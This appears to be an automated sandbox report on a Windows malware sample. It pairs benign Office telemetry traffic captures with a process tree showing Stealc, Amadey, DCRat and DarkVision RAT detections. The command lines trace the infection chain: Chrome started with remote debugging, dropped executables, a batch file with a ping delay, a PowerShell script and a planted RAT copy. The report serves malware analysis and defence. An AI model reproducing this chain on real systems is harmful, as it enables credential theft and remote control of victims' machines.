2024-12-08 18:54:02 UTC	494	IN	HTTP/1.1 200 OK Date: Sun, 08 Dec 2024 18:54:02 GMT Content-Type: text/xml Content-Length: 1405 Connection: close Vary: Accept-Encoding Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:27:58 GMT ETag: "0x8DC582BE89A8F82" x-ms-request-id: be723ded-701e-0021-0f06-483d45000000 x-ms-version: 2018-03-28 x-azure-ref: 20241208T185402Z-r1cf579d778t6txphC1EWRsd4400000006k00000000081bg x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-12-08 18:54:02 UTC	1405	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 30 35 30 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 50 6f 77 65 72 50 6f 69 6e 74 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="700501" V="1" DC="SM" EN="Office.Telemetry.Event.Office.PowerPoint.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantToke

Session ID	Source IP	Source Port	Destination IP	Destination Port
146	192.168.2.4	49939	13.107.246.63	443

Timestamp	Bytes transferred	Direction	Data
2024-12-08 18:54:02 UTC	192	OUT	GET /rules/rule700500v1s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-12-08 18:54:03 UTC	494	IN	HTTP/1.1 200 OK Date: Sun, 08 Dec 2024 18:54:03 GMT Content-Type: text/xml Content-Length: 1368 Connection: close Vary: Accept-Encoding Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:27:53 GMT ETag: "0x8DC582BE51CE7B3" x-ms-request-id: 8bf5655e-801e-0083-0226-49f0ae000000 x-ms-version: 2018-03-28 x-azure-ref: 20241208T185403Z-r1cf579d778mvsklhC1EWRkavg00000006ag000000008vcf x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-12-08 18:54:03 UTC	1368	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 30 35 30 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 50 6f 77 65 72 50 6f 69 6e 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 50 6f 77 65 72 50 6f 69 6e 74 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="700500" V="1" DC="SM" EN="Office.Telemetry.Event.Office.PowerPoint" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenPowerPoint" S="Medium" /> <F T=

Session ID	Source IP	Source Port	Destination IP	Destination Port
147	192.168.2.4	49942	13.107.246.63	443

Timestamp	Bytes transferred	Direction	Data
2024-12-08 18:54:03 UTC	192	OUT	GET /rules/rule701351v1s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-12-08 18:54:03 UTC	494	IN	HTTP/1.1 200 OK Date: Sun, 08 Dec 2024 18:54:03 GMT Content-Type: text/xml Content-Length: 1407 Connection: close Vary: Accept-Encoding Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:27:55 GMT ETag: "0x8DC582BE687B46A" x-ms-request-id: f1085035-901e-007b-3808-48ac50000000 x-ms-version: 2018-03-28 x-azure-ref: 20241208T185403Z-r1cf579d778mvsklhC1EWRkavg00000006bg000000007q28 x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-12-08 18:54:03 UTC	1407	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 31 33 35 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 50 65 72 66 6f 72 6d 61 6e 63 65 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="701351" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Performance.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTok

Session ID	Source IP	Source Port	Destination IP	Destination Port
148	192.168.2.4	49941	13.107.246.63	443

Timestamp	Bytes transferred	Direction	Data
2024-12-08 18:54:03 UTC	192	OUT	GET /rules/rule702550v1s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-12-08 18:54:03 UTC	494	IN	HTTP/1.1 200 OK Date: Sun, 08 Dec 2024 18:54:03 GMT Content-Type: text/xml Content-Length: 1378 Connection: close Vary: Accept-Encoding Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:27:53 GMT ETag: "0x8DC582BE584C214" x-ms-request-id: 40072cf2-b01e-001e-4a03-480214000000 x-ms-version: 2018-03-28 x-azure-ref: 20241208T185403Z-r1cf579d7786c2tshC1EWRr1gc00000005q000000000a3cg x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-12-08 18:54:03 UTC	1378	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 32 35 35 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 50 65 72 73 6f 6e 61 6c 69 7a 61 74 69 6f 6e 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 50 65 72 73 6f 6e 61 6c 69 7a 61 74 69 6f 6e 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="702550" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Personalization" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenPersonalization" S="Medium" />

Session ID	Source IP	Source Port	Destination IP	Destination Port
149	192.168.2.4	49940	13.107.246.63	443

Timestamp	Bytes transferred	Direction	Data
2024-12-08 18:54:03 UTC	192	OUT	GET /rules/rule702551v1s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-12-08 18:54:03 UTC	494	IN	HTTP/1.1 200 OK Date: Sun, 08 Dec 2024 18:54:03 GMT Content-Type: text/xml Content-Length: 1415 Connection: close Vary: Accept-Encoding Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:27:39 GMT ETag: "0x8DC582BDCE9703A" x-ms-request-id: 8337024b-c01e-0079-5d05-48e51a000000 x-ms-version: 2018-03-28 x-azure-ref: 20241208T185403Z-r1cf579d778xr2r4hC1EWRqvfs000000069g000000000xb3 x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-12-08 18:54:03 UTC	1415	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 32 35 35 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 50 65 72 73 6f 6e 61 6c 69 7a 61 74 69 6f 6e 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="702551" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Personalization.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenan

Target ID:	0
Start time:	13:51:58
Start date:	08/12/2024
Path:	C:\Users\user\Desktop\file.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\file.exe"
Imagebase:	0xaf0000
File size:	1'806'336 bytes
MD5 hash:	807928C7C8D81BF2C9F4AB5BA2F4763B
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 00000000.00000002.2113309307.0000000000AF1000.00000040.00000001.01000000.00000003.sdmp, Author: Joe Security Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 00000000.00000002.2114430584.000000000176E000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 00000000.00000003.1668555153.00000000054C0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	1
Start time:	13:52:08
Start date:	08/12/2024
Path:	C:\Program Files\Google\Chrome\Application\chrome.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9229 --profile-directory=""
Imagebase:	0x7ff76e190000
File size:	3'242'272 bytes
MD5 hash:	45DE480806D1B5D462A7DDE4DCEFC4E4
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	2
Start time:	13:52:08
Start date:	08/12/2024
Path:	C:\Windows\System32\svchost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
Imagebase:	0x7ff6eef20000
File size:	55'320 bytes
MD5 hash:	B7F884C1B74A263F746EE12A5F7C9F6A
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	false

Show Windows behavior

Target ID:	3
Start time:	13:52:09
Start date:	08/12/2024
Path:	C:\Program Files\Google\Chrome\Application\chrome.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2204 --field-trial-handle=2148,i,11544534191024367753,17094532102307047588,262144 /prefetch:8
Imagebase:	0x7ff76e190000
File size:	3'242'272 bytes
MD5 hash:	45DE480806D1B5D462A7DDE4DCEFC4E4
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	7
Start time:	13:52:42
Start date:	08/12/2024
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\system32\cmd.exe" /c start "" "C:\Users\user\Documents\DBFIEHDHII.exe"
Imagebase:	0x240000
File size:	236'544 bytes
MD5 hash:	D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	8
Start time:	13:52:42
Start date:	08/12/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0xd30000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	9
Start time:	13:52:42
Start date:	08/12/2024
Path:	C:\Users\user\Documents\DBFIEHDHII.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Documents\DBFIEHDHII.exe"
Imagebase:	0xd40000
File size:	3'251'712 bytes
MD5 hash:	9B3EF3C58C88279086B777393B2CE36B
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 00000009.00000002.2153817470.0000000000D41000.00000040.00000001.01000000.0000000B.sdmp, Author: Joe Security
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	10
Start time:	13:52:45
Start date:	08/12/2024
Path:	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe"
Imagebase:	0xdd0000
File size:	3'251'712 bytes
MD5 hash:	9B3EF3C58C88279086B777393B2CE36B
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 0000000A.00000002.2182584955.0000000000DD1000.00000040.00000001.01000000.0000000E.sdmp, Author: Joe Security
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	11
Start time:	13:52:45
Start date:	08/12/2024
Path:	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
Wow64 process (32bit):	true
Commandline:	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
Imagebase:	0xdd0000
File size:	3'251'712 bytes
MD5 hash:	9B3EF3C58C88279086B777393B2CE36B
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 0000000B.00000002.2188220739.0000000000DD1000.00000040.00000001.01000000.0000000E.sdmp, Author: Joe Security
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	12
Start time:	13:53:00
Start date:	08/12/2024
Path:	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
Wow64 process (32bit):	true
Commandline:	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
Imagebase:	0xdd0000
File size:	3'251'712 bytes
MD5 hash:	9B3EF3C58C88279086B777393B2CE36B
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 0000000C.00000002.2957628244.0000000000DD1000.00000040.00000001.01000000.0000000E.sdmp, Author: Joe Security
Reputation:	low
Has exited:	false

Show Windows behavior

Target ID:	13
Start time:	13:53:17
Start date:	08/12/2024
Path:	C:\Users\user\AppData\Local\Temp\1013238001\wTMEVe8.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Local\Temp\1013238001\wTMEVe8.exe"
Imagebase:	0xe40000
File size:	4'122'624 bytes
MD5 hash:	5DB95C4DE9B6E98C653AC3DEC5DCE83D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Antivirus matches:	Detection: 100%, Joe Sandbox ML Detection: 26%, ReversingLabs
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	14
Start time:	13:53:17
Start date:	08/12/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	15
Start time:	13:53:17
Start date:	08/12/2024
Path:	C:\Users\user\AppData\Local\Temp\1013238001\wTMEVe8.exe
Wow64 process (32bit):	false
Commandline:	"C:\Users\user\AppData\Local\Temp\1013238001\wTMEVe8.exe"
Imagebase:	0xe40000
File size:	4'122'624 bytes
MD5 hash:	5DB95C4DE9B6E98C653AC3DEC5DCE83D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	16
Start time:	13:53:17
Start date:	08/12/2024
Path:	C:\Users\user\AppData\Local\Temp\1013238001\wTMEVe8.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Local\Temp\1013238001\wTMEVe8.exe"
Imagebase:	0xe40000
File size:	4'122'624 bytes
MD5 hash:	5DB95C4DE9B6E98C653AC3DEC5DCE83D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_DCRat_1, Description: Yara detected DCRat, Source: 00000010.00000002.2455002578.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	17
Start time:	13:53:18
Start date:	08/12/2024
Path:	C:\Users\user\AppData\Roaming\XXgM7ZsSvR.exe
Wow64 process (32bit):	false
Commandline:	"C:\Users\user\AppData\Roaming\XXgM7ZsSvR.exe"
Imagebase:	0x7ff6ebbc0000
File size:	18'944 bytes
MD5 hash:	F3EDFF85DE5FD002692D54A04BCB1C09
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Antivirus matches:	Detection: 0%, ReversingLabs
Has exited:	true

Show Windows behavior

Target ID:	18
Start time:	13:53:18
Start date:	08/12/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	19
Start time:	13:53:18
Start date:	08/12/2024
Path:	C:\Users\user\AppData\Roaming\wVBhC3KCkV.exe
Wow64 process (32bit):	false
Commandline:	"C:\Users\user\AppData\Roaming\wVBhC3KCkV.exe"
Imagebase:	0x7f0000
File size:	1'709'568 bytes
MD5 hash:	579FD24F4CACC972F63F47214F9C3C34
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_DCRat_1, Description: Yara detected DCRat, Source: 00000013.00000000.2454433505.00000000007F2000.00000002.00000001.01000000.00000011.sdmp, Author: Joe Security Rule: JoeSecurity_DCRat_1, Description: Yara detected DCRat, Source: C:\Users\user\AppData\Roaming\wVBhC3KCkV.exe, Author: Joe Security Rule: JoeSecurity_DCRat_1, Description: Yara detected DCRat, Source: C:\Users\user\AppData\Roaming\wVBhC3KCkV.exe, Author: Joe Security Rule: JoeSecurity_DCRat_1, Description: Yara detected DCRat, Source: C:\Users\user\AppData\Roaming\wVBhC3KCkV.exe, Author: Joe Security
Antivirus matches:	Detection: 68%, ReversingLabs
Has exited:	true

Show Windows behavior

Target ID:	20
Start time:	13:53:21
Start date:	08/12/2024
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	"C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\580b9vjIX7.bat"
Imagebase:	0x7ff674580000
File size:	289'792 bytes
MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	21
Start time:	13:53:21
Start date:	08/12/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	22
Start time:	13:53:21
Start date:	08/12/2024
Path:	C:\Windows\System32\chcp.com
Wow64 process (32bit):	false
Commandline:	chcp 65001
Imagebase:	0x7ff6bcb40000
File size:	14'848 bytes
MD5 hash:	33395C4732A49065EA72590B14B64F32
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	24
Start time:	13:53:22
Start date:	08/12/2024
Path:	C:\Windows\System32\PING.EXE
Wow64 process (32bit):	false
Commandline:	ping -n 10 localhost
Imagebase:	0x7ff70f5b0000
File size:	22'528 bytes
MD5 hash:	2F46799D79D22AC72C241EC0322B011D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	26
Start time:	13:53:26
Start date:	08/12/2024
Path:	C:\Users\user\AppData\Local\Temp\1013239001\ntRoEwh.exe
Wow64 process (32bit):	false
Commandline:	"C:\Users\user\AppData\Local\Temp\1013239001\ntRoEwh.exe"
Imagebase:	0x7ff6d9520000
File size:	2'343'424 bytes
MD5 hash:	3541C1AC26EB5BBB87F01C20FD9F8824
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Antivirus matches:	Detection: 100%, Joe Sandbox ML Detection: 18%, ReversingLabs
Has exited:	false

Show Windows behavior

Target ID:	27
Start time:	13:53:26
Start date:	08/12/2024
Path:	C:\Users\user\AppData\Local\Temp\IXP000.TMP\callmobile.exe
Wow64 process (32bit):	true
Commandline:	C:\Users\user\AppData\Local\Temp\IXP000.TMP\callmobile.exe
Imagebase:	0xca0000
File size:	2'458'112 bytes
MD5 hash:	FFABCC262FB699998B6191D7656C8805
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 0000001B.00000002.2962692398.0000000003171000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 0000001B.00000002.3362367809.0000000005E80000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
Antivirus matches:	Detection: 18%, ReversingLabs
Has exited:	false

Show Windows behavior

Target ID:	28
Start time:	13:53:31
Start date:	08/12/2024
Path:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -executionpolicy remotesigned -File "C:\Users\user\AppData\Local\Temp\1013248041\KeaEfrP.ps1"
Imagebase:	0xad0000
File size:	433'152 bytes
MD5 hash:	C32CA4ACFCC635EC1EA6ED8A34DF5FAC
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_DarkVisionRat, Description: Yara detected DarkVision Rat, Source: 0000001C.00000002.2807680074.00000000060A7000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 0000001C.00000002.2807680074.00000000060A7000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_DarkVisionRat, Description: Yara detected DarkVision Rat, Source: 0000001C.00000002.2807680074.0000000005D38000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 0000001C.00000002.2807680074.0000000005D38000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
Has exited:	true

Show Windows behavior

Target ID:	29
Start time:	13:53:31
Start date:	08/12/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	30
Start time:	13:53:31
Start date:	08/12/2024
Path:	C:\Program Files (x86)\jDownloader\config\qAbAtwEYfetkHedLuHYBzRERlhhmKB.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files (x86)\jdownloader\config\qAbAtwEYfetkHedLuHYBzRERlhhmKB.exe"
Imagebase:	0x3b0000
File size:	1'709'568 bytes
MD5 hash:	579FD24F4CACC972F63F47214F9C3C34
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_DCRat_1, Description: Yara detected DCRat, Source: 0000001E.00000002.2958021104.00000000029DC000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_DCRat_1, Description: Yara detected DCRat, Source: 0000001E.00000002.2958021104.0000000002761000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_DCRat_1, Description: Yara detected DCRat, Source: C:\Program Files (x86)\jDownloader\config\qAbAtwEYfetkHedLuHYBzRERlhhmKB.exe, Author: Joe Security
Antivirus matches:	Detection: 100%, Avira Detection: 100%, Avira Detection: 100%, Avira Detection: 100%, Joe Sandbox ML Detection: 100%, Joe Sandbox ML Detection: 100%, Joe Sandbox ML Detection: 68%, ReversingLabs
Has exited:	false

Show Windows behavior

Target ID:	33
Start time:	13:53:37
Start date:	08/12/2024
Path:	C:\Windows\System32\rundll32.exe
Wow64 process (32bit):	false
Commandline:	"C:\Windows\system32\rundll32.exe" C:\Windows\system32\advpack.dll,DelNodeRunDLL32 "C:\Users\user\AppData\Local\Temp\IXP000.TMP\"
Imagebase:	0x7ff740240000
File size:	71'680 bytes
MD5 hash:	EF3179D498793BF4234F708D3BE28633
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	34
Start time:	13:53:39
Start date:	08/12/2024
